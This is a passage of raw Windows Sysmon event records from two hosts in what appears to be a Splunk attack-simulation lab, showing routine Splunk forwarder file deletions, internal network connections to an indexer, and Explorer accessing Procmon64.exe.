Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51431-false10.0.1.12-8000- 23542300x8000000000000000217986Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:31.193{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=560B4660A5EE177169FA6F69BAD31FCA,SHA256=27B4CFC42E3EC0864384AF6098AA4F251A063CCED45CDDDE4360C31A8B0D81FA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293505Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:31.859{C8EA50B7-F2AD-6215-C000-000000003802}48564884C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293504Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:31.843{C8EA50B7-F2AD-6215-C000-000000003802}48564884C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293503Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:31.843{C8EA50B7-F2AD-6215-C000-000000003802}48564884C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293502Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:31.046{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB1F95D74EC011957D6D81B43717E8D1,SHA256=1F214CF0F9B5012D47C991BE67F0479F657A0650DB9503F5051A386CDDBB9241,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217987Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:32.396{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=764015FA4C887AFD1DA24C5E74E02B22,SHA256=669AB874CE71914B029DA19D23F34A1443D6BA7B8A3B09F94DE2DCBBF8A3A721,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293512Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:32.606{C8EA50B7-F2AD-6215-C000-000000003802}48564884C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293511Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:32.606{C8EA50B7-F2AD-6215-C000-000000003802}48564884C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293510Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:32.606{C8EA50B7-F2AD-6215-C000-000000003802}48564884C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293509Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:32.521{C8EA50B7-F2AD-6215-C000-000000003802}48564884C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293508Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:32.521{C8EA50B7-F2AD-6215-C000-000000003802}48564884C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293507Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:32.521{C8EA50B7-F2AD-6215-C000-000000003802}48564884C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293506Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:32.060{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2A5307DFB39161D85267D7E2EBE9AE9,SHA256=81ECF5FB4C8C9DA414DC667FA5FFCF7122FFA1FB5F2D3B33C1D60727BDA3573D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217988Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:33.396{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15D3588EEBA3DC5E8D3B1D40EB93BF8B,SHA256=346185893C8CE9288372BC00B974D1E7D16E54E531BBC2A08FAA37A58921FE06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293514Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:33.405{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=293AD07E515046D403DFE5A29426C980,SHA256=9D899806BD5781426720A7B1DA3102178CACBF858D7D8C9073C7942CECA19C4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293513Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:33.090{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DB033987116E4181B760A9E9A2DD634,SHA256=6F8D274D40938E7D9BD0643299A5A63A4D86A07DEA2CCEC8EA9BDA781E39F31D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217989Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:34.411{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DAD7B3706E7A8B7C794E10ADD68A0CB,SHA256=612BB8032C19EF2B237EB93540C56028AD710418F53094925C43F040C87735FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293515Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:34.105{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3364011249CBA08A9A3C9F7F368CCDCA,SHA256=BE08EF197A8D14147695EAC3BAF431B9FBEB8B30A56AE7F30AC0F19103187F1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217990Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:35.443{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61236B816D534D5B9CB3D2A5F8FB00DF,SHA256=5CE8909AE4F51E6B755C6E47B420F4A6BCB55F8CEF6CA01CBC1F0E9681F8787C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293517Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:33.725{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53806-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000293516Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:35.120{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEA0E5916153DBFD49826F480B80A952,SHA256=986C248DB03D214ACD1DE256FB78C4DC12A1CD715315F91495D6B361D54B42A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217992Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:36.458{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33153DA7BA56712E023C55C49FDE9A97,SHA256=61747DE0A5D38DE70E1962C39666C86E10D4564D5FC41C56ACDB55C84A23DD88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293518Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:36.151{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02D6862F137773787DAB752B168D8489,SHA256=D4499C35526C9B1CAEADDE6EF57570184A68363173F9A5B327FF44FEEC7F67D5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217991Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:33.609{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51432-false10.0.1.12-8000- 23542300x8000000000000000293519Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:37.155{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19B9DC47EEDF8C79978E7971AFD89470,SHA256=C7ADAC275B2638919156E8BEFA5B0B1973AFAFD64677AB6140D7D1B7364BA439,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217993Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:37.474{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F60750834320DDBCCBD7A21FA00E16D3,SHA256=99A6E983DBE7EBEF8A7A86CBEE31FE91BC797156A44FDFCE6BA969B6D06AFA43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217994Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:38.536{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5383C37E0CC3DAE2A7F208D1206889A7,SHA256=28C1E624531D758C14FF7CFD7E9DF81BF5C38D0015F30E351AD363CCC1CA67C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293520Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:38.158{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86319741BF54BE8B9F90F4E72E3D74AB,SHA256=41BDABE7618CB83CF44836250718DC0BC0E9307AFB8265999C1709A846BCBA9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217995Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:39.567{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C87433E8E9FFED6B5C0AE38F10C3B3A,SHA256=9EEB8239E114FDC6958CD92C65A90D0C8DFB2805F1F2981F099171D3A0209090,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293523Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:39.178{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B31464873497CF73B9C9AB225206905,SHA256=82A00A70CDFF321E85DF9C9A3B7478BA2C1040AF232E0A750B59682EC2A47856,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293522Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:39.042{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C889C03A7352C7739363ABCB916EF8FD,SHA256=059C0A249E9B1B6893F2EA70771D7AEC9021BCE6CC0F9E8E4017BB3E24C96731,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293521Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:39.042{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=D4E950A98E4E7A6B6FDA6F0A9D1D8754,SHA256=7ABBB4FA6F34E1A84C21218A6C870E5E3BFB1E6C97CE639D806E0D19AD62753E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217996Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:40.599{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=155FD92B3162C215012ECAB1102CC161,SHA256=67A64B6BBF94A6DD7E76E519365C1C4EAE5A5AFAC25331C1E9351E1EE9037CAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293525Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:40.210{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21AAF50943E2C2D7CA49BC04634AFEE1,SHA256=FCC67A8E682E2F173A0C734B7F3A286E6C81EBBCD9C5C3CD76D702942701B5BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293524Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:40.042{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217998Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:41.630{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=913F60A896AB42E56F130B43CDFF6FB7,SHA256=AAF53D9C0B8626A7E163A2F7CC94D9AB1D584AA597825C586D7EEB8199E5E9B2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293528Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:39.546{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53810-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000293527Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:39.484{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53809-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000293526Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:41.238{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC7026D872492617F8D87962B749FFBC,SHA256=D7382CF8D58F90019FAA2C094ABCF6B8AC03E11796BBB6A8D33C2A5DB9148319,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217997Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:38.657{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51433-false10.0.1.12-8000- 23542300x8000000000000000217999Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:42.645{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=489AFCF61113A1990E5DFF5492F067EC,SHA256=51056CCA89991675FE865FC151286B446FDE4D0A949620816ECC3EAB7DCA7421,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293529Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:42.253{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20343B57A7FB105CE10FF741C5C8A883,SHA256=74FBAC470DF582CE54FD643AC659576B613B24DAB5627AC32D2D1509C7BA9902,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218000Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:43.664{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D53D8831239054DBE7CAA8F15ADA8BD,SHA256=E11433FC230FF2B078F5A5FC6EC40AF7820EA696D01C4FA561A36D164676C142,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293530Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:43.290{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 